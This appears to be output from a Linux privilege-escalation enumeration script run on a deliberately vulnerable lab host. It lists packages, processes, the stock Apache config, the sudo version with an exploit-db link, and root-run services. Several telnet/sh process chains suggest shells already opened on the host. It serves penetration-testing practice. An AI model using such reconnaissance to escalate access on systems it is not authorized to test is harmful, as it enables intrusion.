    nano 2.0.7-1ubuntu1  Pico clone with some new features
    ncurses-base 5.6+20071124-1ubuntu2  of common terminal types
    ncurses-bin 5.6+20071124-1ubuntu2  programs and man pages
    net-tools 1.60-19ubuntu1  NET-3 networking toolkit
    netbase 4.30ubuntu1  TCP/IP networking system
    netcat 1.10-36  swiss army knife -- transitional pack
    netcat-traditional 1.10-36  swiss army knife
    nfs-common 1:1.1.2-2ubuntu2.2  support files common to client and serve
    nfs-kernel-server 1:1.1.2-2ubuntu2.2  for NFS kernel server
    nmap 4.53-3  Network Mapper
    ntfs-3g 1:1.2216-1ubuntu1  NTFS driver for FUSE
    ntpdate 1:4.2.4p4+dfsg-3ubuntu2  for setting system time from NTP serv
    openbsd-inetd 0.20050402-6  OpenBSD Internet Superserver
    openssh-client 1:4.7p1-8ubuntu1  shell client, an rlogin/rsh/rcp repla
    openssh-server 1:4.7p1-8ubuntu1  shell server, an rshd replacement
    openssl 0.9.8g-4ubuntu3  Socket Layer (SSL) binary and related
    p7zip-full 4.57~dfsg.1-1  and 7za file archivers with high compress
    parted 1.7.1-5.1ubuntu9  GNU Parted disk partition resizing progr
    passwd 1:4.0.18.2-1ubuntu2  and administer password and group dat
    patch 2.5.9-4  a diff file to an original
    pciutils 1:2.2.4-1.1ubuntu3  PCI Utilities
    pcmciautils 014-4ubuntu1  utilities for Linux 2.6
    perl 5.8.8-12ubuntu0.5  Wall's Practical Extraction and Report
    perl-base 5.8.8-12ubuntu0.5  Pathologically Eclectic Rubbish Lister
    perl-modules 5.8.8-12ubuntu0.5  Perl modules
    php5-cgi 5.2.4-2ubuntu5.10  HTML-embedded scripting languag
    php5-cli 5.2.4-2ubuntu5.10  interpreter for the php5 script
    php5-common 5.2.4-2ubuntu5.10  files for packages built from the php
    php5-gd 5.2.4-2ubuntu5.10  module for php5
    php5-mysql 5.2.4-2ubuntu5.10  module for php5
    pidgin 1:2.5.2-0ubuntu1.2~hardy1  multi-protocol instant messaging c
    pidgin-data 1:2.5.2-0ubuntu1.2~hardy1  instant messaging client - da
    pkg-config 0.22-1  compile and link flags for libraries
    po-debconf 1.0.10  translated Debconf templates files wi
    popularity-contest 1.43ubuntu1  for your favourite packages automatical
    portmap 6.0-4  RPC portmapper
    postfix 2.5.1-2ubuntu1  mail transport agent
    postgresql-8.3 8.3.1-1  SQL database, version 8.3
    postgresql-client-8.3 8.3.1-1  programs for PostgreSQL 8.3
    postgresql-client-common 87  for multiple PostgreSQL client versi
    postgresql-common 87  database-cluster manager
    ppp 2.4.4rel-9ubuntu2  Protocol (PPP) daemon
    pppconfig 2.3.17ubuntu1  text menu based utility for configuring pp
    pppoeconf 1.17ubuntu1  PPPoE/ADSL connections
    procps 1:3.2.7-5ubuntu2  file system utilities
    proftpd 1.3.1-6ubuntu1  virtual-hosting FTP daemon - bina
    psmisc 22.6-1  that use the proc filesystem
    python 2.5.2-0ubuntu1  interactive high-level object-oriented la
    python-apt 0.7.4ubuntu7  interface to libapt-pkg
    python-central 0.6.5ubuntu1  and build utility for Python packag
    python-gdbm 2.5.2-0ubuntu2  dbm database support for Python
    python-gnupginterface 0.3.2-9ubuntu1  interface to GnuPG (GPG)
    python-minimal 2.5.2-0ubuntu1  minimal subset of the Python language (def
    python-support 0.7.5ubuntu1  rebuilding support for python modu
    python2.5 2.5.2-2ubuntu6.1  interactive high-level object-oriented la
    python2.5-dev 2.5.2-2ubuntu6.1  files and a static library for Python
    python2.5-minimal 2.5.2-2ubuntu6.1  minimal subset of the Python language (ver
    quilt 0.46-4  to work with series of patches
    rcs 5.7-21  GNU Revision Control System
    readline-common 5.2-3build1  readline and history libraries, common f
    reiserfsprogs 1:3.6.19-6  tools for ReiserFS filesystems
    rhino 1.6.R7-2ubuntu1  engine written in Java
    rsh-client 0.17-14ubuntu1  clients
    rsh-server 0.17-14ubuntu1  servers
    rsync 2.6.9-6ubuntu2  remote file copy program (like rcp)
    ruby 4.1  interpreter of object-oriented scripting
    ruby1.8 1.8.6.111-2ubuntu1.3  of object-oriented scripting lan
    samba 3.0.20-0.1ubuntu1  LanManager-like file and printer server fo
    samba-common 3.0.20-0.1ubuntu1  common files used by both the server a
    screen 4.0.3-7ubuntu1  multiplexor with VT100/ANSI termina
    sed 4.1.5-5  GNU sed stream editor
    sgml-base 1.26  infrastructure and SGML catalog file su
    snmp 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) ap
    snmpd 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) ag
    socat 1.6.0.0-1  relay for bidirectional data tr
    ssl-cert 1.0.14-0ubuntu2  debconf wrapper for openssl
    startup-tasks 0.3.9-2  of essential tasks to run on sta
    strace 4.5.15-1.1ubuntu1  system call tracer
    sudo 1.6.9p10-1ubuntu3  limited super user privileges to spe
    sysklogd 1.5-1ubuntu1  Logging Daemon
    system-services 0.3.9-2  of essential system services
    sysv-rc 2.86.ds1-14.1ubuntu45  runlevel change mechanism
    sysvutils 2.86.ds1-14.1ubuntu45  utilities
    tar 1.19-3  version of the tar archiving utility
    tasksel 2.70ubuntu5  for selecting tasks for installation on
    tasksel-data 2.70ubuntu5  tasks used for installation of Debi
    tcpd 7.6.dbs-14  Venema's TCP wrapper utilities
    tcpdump 3.9.8-2  powerful tool for network monitoring and d
    telnet 0.17-35ubuntu1  telnet client
    telnetd 0.17-35ubuntu1  telnet server
    tftpd 0.17-15ubuntu1  file transfer protocol server
    tightvncserver 1.2.9-22  network computing server software
    time 1.7-21build1  GNU time program for measuring cpu resou
    tomcat5.5 5.5.25-5ubuntu1.2  and JSP engine
    tomcat5.5-admin 5.5.25-5ubuntu1.2  Servlet engine -- admin & manager web i
    tomcat5.5-webapps 5.5.25-5ubuntu1.2  Servlet engine -- documentation and exa
    ttf-dejavu 2.23-1  to pull in ttf-dejavu-core and t
    ttf-dejavu-core 2.23-1  font family derivate with additional ch
    ttf-dejavu-extra 2.23-1  font family derivate with additional ch
    tzdata 2008b-1ubuntu1  zone and daylight-saving time data
    ubuntu-keyring 2008.03.04  keys of the Ubuntu archive
    ubuntu-minimal 1.102  core of Ubuntu
    ubuntu-standard 1.102  Ubuntu standard system
    ucf 3.005  Configuration File: preserve user cha
    udev 117-8  device node and kernel event mana
    ufw 0.16.2  for managing a netfilter firewall
    unzip 5.52-10ubuntu2  for .zip files
    update-inetd 4.27-0.6  updater
    update-manager-core 1:0.87.24  release upgrades
    upstart 0.3.9-2  init daemon
    upstart-compat-sysv 0.3.9-2  for System-V-like init
    upstart-logd 0.3.9-2  logging daemon
    usbutils 0.73-5ubuntu2  USB utilities
    util-linux 2.13.1-5ubuntu1  system utilities
    util-linux-locales 2.13.1-5ubuntu1  files for util-linux
    uuid-runtime 1.40.8-2ubuntu2  unique id library
    vim-common 1:7.1-138+1ubuntu3  IMproved - Common files
    vim-tiny 1:7.1-138+1ubuntu3  IMproved - enhanced vi editor - compact v
    w3m 0.5.1-5.1ubuntu1  browsable pager with excellent tables/fr
    wget 1.10.2-3ubuntu1  files from the web
    whiptail 0.52.2-11.2ubuntu1  user-friendly dialog boxes from she
    wireless-tools 29-1ubuntu2  for manipulating Linux Wireless Extens
    wpasupplicant 0.6.0+0.5.8-0ubuntu2  support for WPA and WPA2 (IEEE 802.11
    x11-apps 7.3+1  applications
    x11-common 1:7.3+10ubuntu10.2  Window System (X.Org) infrastructure
    x11-session-utils 7.3+1  session utilities
    x11-utils 7.3+1  utilities
    x11-xfs-utils 7.3+1  font server utilities
    x11-xkb-utils 7.3+1  XKB utilities
    x11-xserver-utils 7.3+2ubuntu0.1  server utilities
    xauth 1:1.0.2-2  authentication utility
    xbase-clients 1:7.3+10ubuntu10.2  X clients - metapackage
    xbitmaps 1.0.1-2ubuntu1  X bitmaps
    xfonts-100dpi 1:1.0.0-4  dpi fonts for X
    xfonts-75dpi 1:1.0.0-4  dpi fonts for X
    xfonts-base 1:1.0.0-5  fonts for X
    xfonts-encodings 1:1.0.2-3  for X.Org fonts
    xfonts-scalable 1:1.0.0-6ubuntu0.8.04.1  fonts for X
    xfonts-utils 1:1.0.1-2ubuntu1  Window System font utility programs
    xinetd 1:2.3.14-5  for inetd with many enhancements
    xinit 1.0.7-2  server initialisation tool
    xkb-data 1.1~cvs.20080104.1-1ubuntu6  Keyboard Extension (XKB) configuration dat
    xorg 1:7.3+10ubuntu10.2  X Window System
    xserver-xorg 1:7.3+10ubuntu10.2  X.Org X server
    xserver-xorg-core 2:1.4.1~git20080131-1ubuntu9.3  X server - core server
    xserver-xorg-input-all 1:7.3+10ubuntu10.2  X.Org X server -- input driver metapacka
    xserver-xorg-input-evdev 1:1.2.0-1ubuntu2  X server -- evdev input driver
    xserver-xorg-input-kbd 1:1.2.2-3ubuntu1  X server -- keyboard input driver
    xserver-xorg-input-mouse 1:1.2.3-2  X server -- mouse input driver
    xserver-xorg-input-synaptics 0.14.7~git20070706-1ubuntu4  TouchPad driver for X.Org server
    xserver-xorg-input-vmmouse 1:12.4.3-1ubuntu1  X server -- VMMouse input driver to us
    xserver-xorg-input-wacom 1:0.7.9.8-0ubuntu3  X server -- Wacom input driver
    xserver-xorg-video-all 1:7.3+10ubuntu10.2  X.Org X server -- output driver metapack
    xserver-xorg-video-apm 1:1.1.1-10  X server -- APM display driver
    xserver-xorg-video-ark 1:0.6.0-9  X server -- ark display driver
    xserver-xorg-video-ati 1:6.8.0-1ubuntu1  X server -- ATI display driver
    xserver-xorg-video-chips 1:1.1.1-9  X server -- Chips display driver
    xserver-xorg-video-cirrus 1:1.1.0-8ubuntu1  X server -- Cirrus display driver
    xserver-xorg-video-cyrix 1:1.1.0-8  X server -- Cyrix display driver
    xserver-xorg-video-dummy 1:0.2.0-7  X server -- dummy display driver
    xserver-xorg-video-fbdev 1:0.3.1-4  X server -- fbdev display driver
    xserver-xorg-video-geode 2.9.0-1ubuntu2.5  server -- Geode GX2/LX display driver
    xserver-xorg-video-glint 1:1.1.1-8  X server -- Glint display driver
    xserver-xorg-video-i128 1:1.2.1-4  X server -- i128 display driver
    xserver-xorg-video-i740 1:1.1.0-7  X server -- i740 display driver
    xserver-xorg-video-i810 2:1.7.4-0ubuntu7  X server -- Intel i8xx, i9xx display d
    xserver-xorg-video-imstt 1:1.1.0-7  X server -- IMSTT display driver
    xserver-xorg-video-intel 2:2.2.1-1ubuntu13.8  X server -- Intel i8xx, i9xx display d
    xserver-xorg-video-mga 1:1.4.8.dfsg.1-1  X server -- MGA display driver
    xserver-xorg-video-neomagic 1:1.1.1-8  X server -- Neomagic display driver
    xserver-xorg-video-newport 1:0.2.1-4ubuntu1  X server -- Newport display driver
    xserver-xorg-video-nsc 1:2.8.3-2ubuntu0.1  X server -- NSC Geode GX1 display driv
    xserver-xorg-video-nv 1:2.1.8-1ubuntu1  X server -- NV display driver
    xserver-xorg-video-openchrome 1:0.2.901-0ubuntu4  X server -- VIA display driver
    xserver-xorg-video-psb 0.2.1-1ubuntu3  graphics driver for Poulsbo
    xserver-xorg-video-rendition 1:4.1.3.dfsg.1-4  X server -- Rendition display driver
    xserver-xorg-video-s3 1:0.5.0-4  X server -- legacy S3 display driver
    xserver-xorg-video-s3virge 1:1.9.1-7  X server -- S3 ViRGE display driver
    xserver-xorg-video-savage 1:2.1.3-5  X server -- Savage display driver
    xserver-xorg-video-siliconmotion 1:1.5.1-3  X server -- SiliconMotion display driv
    xserver-xorg-video-sis 1:0.9.3-6  X server -- SiS display driver
    xserver-xorg-video-sisusb 1:0.8.1-9  X server -- SiS USB display driver
    xserver-xorg-video-tdfx 1:1.3.0-6  X server -- tdfx display driver
    xserver-xorg-video-tga 1:1.1.0-9ubuntu1  X server -- TGA display driver
    xserver-xorg-video-trident 1:1.2.4-1  X server -- Trident display driver
    xserver-xorg-video-tseng 1:1.1.1-4  X server -- Tseng display driver
    xserver-xorg-video-v4l 1:0.1.1-6ubuntu1  X server -- Video 4 Linux display driv
    xserver-xorg-video-vesa 1:1.3.0-4ubuntu4  X server -- VESA display driver
    xserver-xorg-video-vga 1:4.1.0-8  X server -- VGA display driver
    xserver-xorg-video-via 1:0.2.2-5  X server -- VIA display driver
    xserver-xorg-video-vmware 1:10.15.2-1ubuntu2  X server -- VMware display driver
    xserver-xorg-video-voodoo 1:1.1.1-5  X server -- Voodoo display driver
    xterm 229-1ubuntu1.1  terminal emulator
    zlib1g 1:1.2.3.3.dfsg-7ubuntu1  library - runtime
    zlib1g-dev 1:1.2.3.3.dfsg-7ubuntu1  library - development
[+] Current processes
    USER PID START TIME COMMAND
    root 1 Sep10 0:01 /sbin/init
    root 2 Sep10 0:00 [kthreadd]
    root 3 Sep10 0:00 [migration/0]
    root 4 Sep10 0:00 [ksoftirqd/0]
    root 5 Sep10 0:00 [watchdog/0]
    root 6 Sep10 0:00 [events/0]
    root 7 Sep10 0:00 [khelper]
    root 41 Sep10 0:00 [kblockd/0]
    root 64 Sep10 0:00 [kseriod]
    root 182 Sep10 0:00 [pdflush]
    root 183 Sep10 0:00 [pdflush]
    root 184 Sep10 0:00 [kswapd0]
    root 225 Sep10 0:00 [aio/0]
    root 1245 Sep10 0:00 [ksnapd]
    root 1436 Sep10 0:00 [ata/0]
    root 1439 Sep10 0:00 [ata_aux]
    root 1446 Sep10 0:00 [scsi_eh_0]
    root 1452 Sep10 0:00 [scsi_eh_1]
    root 1463 Sep10 0:00 [ksuspend_usbd]
    root 1468 Sep10 0:00 [khubd]
    root 2331 Sep10 0:00 [scsi_eh_2]
    root 2508 Sep10 0:01 [kjournald]
    root 2683 Sep10 0:00 /sbin/udevd
    root 3046 Sep10 0:00 [kpsmoused]
    root 3992 Sep10 0:00 [kjournald]
    daemon 4211 Sep10 0:00 /sbin/portmap
    statd 4229 Sep10 0:00 /sbin/rpc.statd
    root 4235 Sep10 0:00 [rpciod/0]
    root 4250 Sep10 0:00 /usr/sbin/rpc.idmapd
    root 4477 Sep10 0:00 /sbin/getty
    root 4478 Sep10 0:00 /sbin/getty
    root 4484 Sep10 0:00 /sbin/getty
    root 4487 Sep10 0:00 /sbin/getty
    root 4490 Sep10 0:00 /sbin/getty
    syslog 4528 Sep10 0:00 /sbin/syslogd
    root 4579 Sep10 0:00 /bin/dd
    klog 4581 Sep10 0:00 /sbin/klogd
    bind 4606 Sep10 0:00 /usr/sbin/named
    root 4630 Sep10 0:00 /usr/sbin/sshd
    root 4711 Sep10 0:00 /bin/sh
    mysql 4753 Sep10 0:04 /usr/sbin/mysqld
    root 4755 Sep10 0:00 logger
    postgres 4834 Sep10 0:00 /usr/lib/postgresql/8.3/bin/postgres
    postgres 4837 Sep10 0:02 postgres:
    postgres 4838 Sep10 0:02 postgres:
    postgres 4839 Sep10 0:00 postgres:
    postgres 4840 Sep10 0:00 postgres:
    daemon 4861 Sep10 0:00 distccd
    daemon 4862 Sep10 0:00 distccd
    root 4916 Sep10 0:00 [lockd]
    root 4917 Sep10 0:00 [nfsd4]
    root 4918 Sep10 0:00 [nfsd]
    root 4919 Sep10 0:00 [nfsd]
    root 4920 Sep10 0:00 [nfsd]
    root 4921 Sep10 0:00 [nfsd]
    root 4922 Sep10 0:00 [nfsd]
    root 4923 Sep10 0:00 [nfsd]
    root 4924 Sep10 0:00 [nfsd]
    root 4925 Sep10 0:00 [nfsd]
    root 4929 Sep10 0:00 /usr/sbin/rpc.mountd
    root 4997 Sep10 0:00 /usr/lib/postfix/master
    postfix 5000 Sep10 0:00 qmgr
    root 5005 Sep10 0:00 /usr/sbin/nmbd
    root 5007 Sep10 0:00 /usr/sbin/smbd
    root 5011 Sep10 0:00 /usr/sbin/smbd
    snmp 5013 Sep10 0:04 /usr/sbin/snmpd
    root 5028 Sep10 0:00 /usr/sbin/xinetd
    daemon 5073 Sep10 0:00 distccd
    daemon 5074 Sep10 0:00 distccd
    proftpd 5076 Sep10 0:00 proftpd:
    daemon 5092 Sep10 0:00 /usr/sbin/atd
    root 5105 Sep10 0:00 /usr/sbin/cron
    root 5135 Sep10 0:00 /usr/bin/jsvc
    root 5136 Sep10 0:00 /usr/bin/jsvc
    tomcat55 5138 Sep10 1:24 /usr/bin/jsvc
    root 5158 Sep10 0:00 /usr/sbin/apache2
    root 5179 Sep10 0:00 /usr/bin/rmiregistry
    root 5183 Sep10 0:31 ruby
    root 5188 Sep10 0:01 /usr/bin/unrealircd
    root 5197 Sep10 0:00 /sbin/getty
    root 5202 Sep10 0:06 Xtightvnc
    root 5206 Sep10 0:00 /bin/sh
    root 5209 Sep10 0:00 xterm
    root 5212 Sep10 0:08 fluxbox
    root 5223 Sep10 0:00 -bash
    www-data 8663 06:54 0:00 /usr/sbin/apache2
    www-data 8665 06:54 0:00 /usr/sbin/apache2
    www-data 8668 06:54 0:00 /usr/sbin/apache2
    www-data 8671 06:54 0:00 /usr/sbin/apache2
    www-data 8672 06:54 0:00 /usr/sbin/apache2
    postfix 9368 07:18 0:00 pickup
    nobody 9622 07:45 0:01 /usr/sbin/smbd
    root 9847 08:14 0:00 sleep
    root 9848 08:14 0:00 telnet
    root 9849 08:14 0:00 sh
    root 9850 08:14 0:00 sh
    root 9851 08:14 0:00 telnet
    daemon 9899 08:23 0:00 sleep
    daemon 9900 08:23 0:00 telnet
    daemon 9901 08:23 0:00 sh
    daemon 9902 08:23 0:00 sh
    daemon 9903 08:23 0:00 telnet
    daemon 9930 08:26 0:00 python
    daemon 9931 08:26 0:00 /bin/bash
    daemon 9961 08:34 0:00 python
    daemon 10162 08:34 0:00 /bin/sh
    daemon 10163 08:34 0:00 ps
[+] Apache Version and Modules
    Server version: Apache/2.2.8 (Ubuntu)
    Server built:   Mar  9 2010 20:45:36
[+] Apache Config File
    #
    # Based upon the NCSA server configuration files originally by Rob McCool.
    #
    # This is the main Apache server configuration file.  It contains the
    # configuration directives that give the server its instructions.
    # See https://httpd.apache.org/docs/2.2/ for detailed information about
    # the directives.
    #
    # Do NOT simply read the instructions in here without understanding
    # what they do.  They're here only as hints or reminders.  If you are unsure
    # consult the online docs. You have been warned.
    #
    # The configuration directives are grouped into three basic sections:
    #  1. Directives that control the operation of the Apache server process as a
    #     whole (the 'global environment').
    #  2. Directives that define the parameters of the 'main' or 'default' server,
    #     which responds to requests that aren't handled by a virtual host.
    #     These directives also provide default values for the settings
    #     of all virtual hosts.
    #  3. Settings for virtual hosts, which allow Web requests to be sent to
    #     different IP addresses or hostnames and have them handled by the
    #     same Apache server process.
    #
    # Configuration and logfile names: If the filenames you specify for many
    # of the server's control files begin with "/" (or "drive:/" for Win32), the
    # server will use that explicit path.  If the filenames do *not* begin
    # with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
    # with ServerRoot set to "" will be interpreted by the
    # server as "//var/log/apache2/foo.log".
    #
    ### Section 1: Global Environment
    #
    # The directives in this section affect the overall operation of Apache,
    # such as the number of concurrent requests it can handle or where it
    # can find its configuration files.
    #
    #
    # ServerRoot: The top of the directory tree under which the server's
    # configuration, error, and log files are kept.
    #
    # NOTE!  If you intend to place this on an NFS (or otherwise network)
    # mounted filesystem then please read the LockFile documentation (available
    # at <URL:https://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
    # you will save yourself a lot of trouble.
    #
    # Do NOT add a slash at the end of the directory path.
    #
    ServerRoot "/etc/apache2"
    #
    # The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
    #
    #<IfModule !mpm_winnt.c>
    #<IfModule !mpm_netware.c>
    LockFile /var/lock/apache2/accept.lock
    #</IfModule>
    #</IfModule>
    #
    # PidFile: The file in which the server should record its process
    # identification number when it starts.
    # This needs to be set in /etc/apache2/envvars
    #
    PidFile ${APACHE_PID_FILE}
    #
    # Timeout: The number of seconds before receives and sends time out.
    #
    Timeout 300
    #
    # KeepAlive: Whether or not to allow persistent connections (more than
    # one request per connection). Set to "Off" to deactivate.
    #
    KeepAlive On
    #
    # MaxKeepAliveRequests: The maximum number of requests to allow
    # during a persistent connection. Set to 0 to allow an unlimited amount.
    # We recommend you leave this number high, for maximum performance.
    #
    MaxKeepAliveRequests 100
    #
    # KeepAliveTimeout: Number of seconds to wait for the next request from the
    # same client on the same connection.
    #
    KeepAliveTimeout 15
    ##
    ## Server-Pool Size Regulation (MPM specific)
    ##
    # prefork MPM
    # StartServers: number of server processes to start
    # MinSpareServers: minimum number of server processes which are kept spare
    # MaxSpareServers: maximum number of server processes which are kept spare
    # MaxClients: maximum number of server processes allowed to start
    # MaxRequestsPerChild: maximum number of requests a server process serves
    <IfModule mpm_prefork_module>
    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0
    </IfModule>
    # worker MPM
    # StartServers: initial number of server processes to start
    # MaxClients: maximum number of simultaneous client connections
    # MinSpareThreads: minimum number of worker threads which are kept spare
    # MaxSpareThreads: maximum number of worker threads which are kept spare
    # ThreadsPerChild: constant number of worker threads in each server process
    # MaxRequestsPerChild: maximum number of requests a server process serves
    <IfModule mpm_worker_module>
    StartServers          2
    MaxClients          150
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadsPerChild      25
    MaxRequestsPerChild   0
    </IfModule>
    # These need to be set in /etc/apache2/envvars
    User ${APACHE_RUN_USER}
    Group ${APACHE_RUN_GROUP}
    #
    # AccessFileName: The name of the file to look for in each directory
    # for additional configuration directives.  See also the AllowOverride
    # directive.
    #
    AccessFileName .htaccess
    #
    # The following lines prevent .htaccess and .htpasswd files from being
    # viewed by Web clients.
    #
    <Files ~ "^\.ht">
    Order allow,deny
    Deny from all
    </Files>
    #
    # DefaultType is the default MIME type the server will use for a document
    # if it cannot otherwise determine one, such as from filename extensions.
    # If your server contains mostly text or HTML documents, "text/plain" is
    # a good value.  If most of your content is binary, such as applications
    # or images, you may want to use "application/octet-stream" instead to
    # keep browsers from trying to display binary files as though they are
    # text.
    #
    DefaultType text/plain
    #
    # HostnameLookups: Log the names of clients or just their IP addresses
    # e.g., www.apache.org (on) or 204.62.129.132 (off).
    # The default is off because it'd be overall better for the net if people
    # had to knowingly turn this feature on, since enabling it means that
    # each client request will result in AT LEAST one lookup request to the
    # nameserver.
    #
    HostnameLookups Off
    # ErrorLog: The location of the error log file.
    # If you do not specify an ErrorLog directive within a <VirtualHost>
    # container, error messages relating to that virtual host will be
    # logged here.  If you *do* define an error logfile for a <VirtualHost>
    # container, that host's errors will be logged there and not here.
    #
    ErrorLog /var/log/apache2/error.log
    #
    # LogLevel: Control the number of messages logged to the error_log.
    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    #
    LogLevel warn
    # Include module configuration:
    Include /etc/apache2/mods-enabled/*.load
    Include /etc/apache2/mods-enabled/*.conf
    # Include all the user configurations:
    Include /etc/apache2/httpd.conf
    # Include ports listing
    Include /etc/apache2/ports.conf
    #
    # The following directives define some format nicknames for use with
    # a CustomLog directive (see below).
    # If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
    #
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    LogFormat "%{Referer}i -> %U" referer
    LogFormat "%{User-agent}i" agent
    #
    # ServerTokens
    # This directive configures what you return as the Server HTTP response
    # Header. The default is 'Full' which sends information about the OS-Type
    # and compiled in modules.
    # Set to one of:  Full | OS | Minor | Minimal | Major | Prod
    # where Full conveys the most information, and Prod the least.
    #
    ServerTokens Full
    #
    # Optionally add a line containing the server version and virtual host
    # name to server-generated pages (internal error documents, FTP directory
    # listings, mod_status and mod_info output etc., but not CGI generated
    # documents or custom error documents).
    # Set to "EMail" to also include a mailto: link to the ServerAdmin.
    # Set to one of:  On | Off | EMail
    #
    ServerSignature On
    #
    # Customizable error responses come in three flavors:
    # 1) plain text 2) local redirects 3) external redirects
    #
    # Some examples:
    #ErrorDocument 500 "The server made a boo boo."
    #ErrorDocument 404 /missing.html
    #ErrorDocument 404 "/cgi-bin/missing_handler.pl"
    #ErrorDocument 402 https://www.example.com/subscription_info.html
    #
    #
    # Putting this all together, we can internationalize error responses.
    #
    # We use Alias to redirect any /error/HTTP_<error>.html.var response to
    # our collection of by-error message multi-language collections.  We use
    # includes to substitute the appropriate text.
    #
    # You can modify the messages' appearance without changing any of the
    # default HTTP_<error>.html.var files by adding the line:
    #
    #   Alias /error/include/ "/your/include/path/"
    #
    # which allows you to create your own set of files by starting with the
    # /usr/share/apache2/error/include/ files and copying them to /your/include/path/,
    # even on a per-VirtualHost basis.  The default include files will display
    # your Apache version number and your ServerAdmin email address regardless
    # of the setting of ServerSignature.
    #
    # The internationalized error documents require mod_alias, mod_include
    # and mod_negotiation.  To activate them, uncomment the following 30 lines.
    #    Alias /error/ "/usr/share/apache2/error/"
    #
    #    <Directory "/usr/share/apache2/error">
    #        AllowOverride None
    #        Options IncludesNoExec
    #        AddOutputFilter Includes html
    #        AddHandler type-map var
    #        Order allow,deny
    #        Allow from all
    #        LanguagePriority en cs de es fr it nl sv pt-br ro
    #        ForceLanguagePriority Prefer Fallback
    #    </Directory>
    #
    #    ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
    #    ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
    #    ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
    #    ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
    #    ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
    #    ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
    #    ErrorDocument 410 /error/HTTP_GONE.html.var
    #    ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
    #    ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
    #    ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
    #    ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
    #    ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var
    #    ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
    #    ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
    #    ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
    #    ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
    #    ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var
    # Include of directories ignores editors' and dpkg's backup files,
    # see README.Debian for details.
    # Include generic snippets of statements
    Include /etc/apache2/conf.d/
    # Include the virtual host configurations:
    Include /etc/apache2/sites-enabled/
[+] Sudo Version (Check out https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
    Sudo version 1.6.9p10
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
    root 5212 Sep10 0:08 fluxbox
        Possible Related Packages: 
             fluxbox 1.1.1-1~hardy1  configurable and low resource X11 Win
    root 4579 Sep10 0:00 /bin/dd
    root 1468 Sep10 0:00 [khubd]
    root 5179 Sep10 0:00 /usr/bin/rmiregistry
    root 4922 Sep10 0:00 [nfsd]
    root 3046 Sep10 0:00 [kpsmoused]
    root 4919 Sep10 0:00 [nfsd]
    root 4929 Sep10 0:00 /usr/sbin/rpc.mountd
    root 183 Sep10 0:00 [pdflush]
    root 5223 Sep10 0:00 -bash
    root 5007 Sep10 0:00 /usr/sbin/smbd
    root 5011 Sep10 0:00 /usr/sbin/smbd
    root 4918 Sep10 0:00 [nfsd]
    root 41 Sep10 0:00 [kblockd/0]
    root 4997 Sep10 0:00 /usr/lib/postfix/master
        Possible Related Packages: 
             base-passwd 3.5.16  base system master password and group
    root 1446 Sep10 0:00 [scsi_eh_0]
    root 5206 Sep10 0:00 /bin/sh
    root 9849 08:14 0:00 sh
    root 4916 Sep10 0:00 [lockd]
    root 2508 Sep10 0:01 [kjournald]
    root 5158 Sep10 0:00 /usr/sbin/apache2
        Possible Related Packages: 
             apache2 2.2.8-1  generation, scalable, extendable web se
             apache2-mpm-prefork 2.2.8-1ubuntu0.15  model for Apache HTTPD
             apache2-utils 2.2.8-1ubuntu0.15  programs for webservers
             apache2.2-common 2.2.8-1ubuntu0.15  generation, scalable, extendable web se
             libapache2-mod-php5 5.2.4-2ubuntu5.24  HTML-embedded scripting languag
    root 4711 Sep10 0:00 /bin/sh
    root 6 Sep10 0:00 [events/0]
    root 4490 Sep10 0:00 /sbin/getty
    root 1436 Sep10 0:00 [ata/0]
    root 9848 08:14 0:00 telnet
        Possible Related Packages: 
             telnet 0.17-35ubuntu1  telnet client
             telnetd 0.17-35ubuntu1  telnet server
    root 3 Sep10 0:00 [migration/0]
    root 2331 Sep10 0:00 [scsi_eh_2]
    root 4 Sep10 0:00 [ksoftirqd/0]
    root 4630 Sep10 0:00 /usr/sbin/sshd
    root 5135 Sep10 0:00 /usr/bin/jsvc
        Possible Related Packages: 
             jsvc 1.0.2~svn20061127-6  to launch Java applications as daemo
    root 4235 Sep10 0:00 [rpciod/0]
    root 64 Sep10 0:00 [kseriod]
    root 7 Sep10 0:00 [khelper]
    root 4478 Sep10 0:00 /sbin/getty
    root 5005 Sep10 0:00 /usr/sbin/nmbd
    root 5202 Sep10 0:06 Xtightvnc
    root 5188 Sep10 0:01 /usr/bin/unrealircd
    root 9851 08:14 0:00 telnet
        Possible Related Packages: 
             telnet 0.17-35ubuntu1  telnet client
             telnetd 0.17-35ubuntu1  telnet server
    root 5 Sep10 0:00 [watchdog/0]
    root 4755 Sep10 0:00 logger
    root 4917 Sep10 0:00 [nfsd4]
    root 4477 Sep10 0:00 /sbin/getty
    root 1463 Sep10 0:00 [ksuspend_usbd]
    root 5105 Sep10 0:00 /usr/sbin/cron
        Possible Related Packages: 
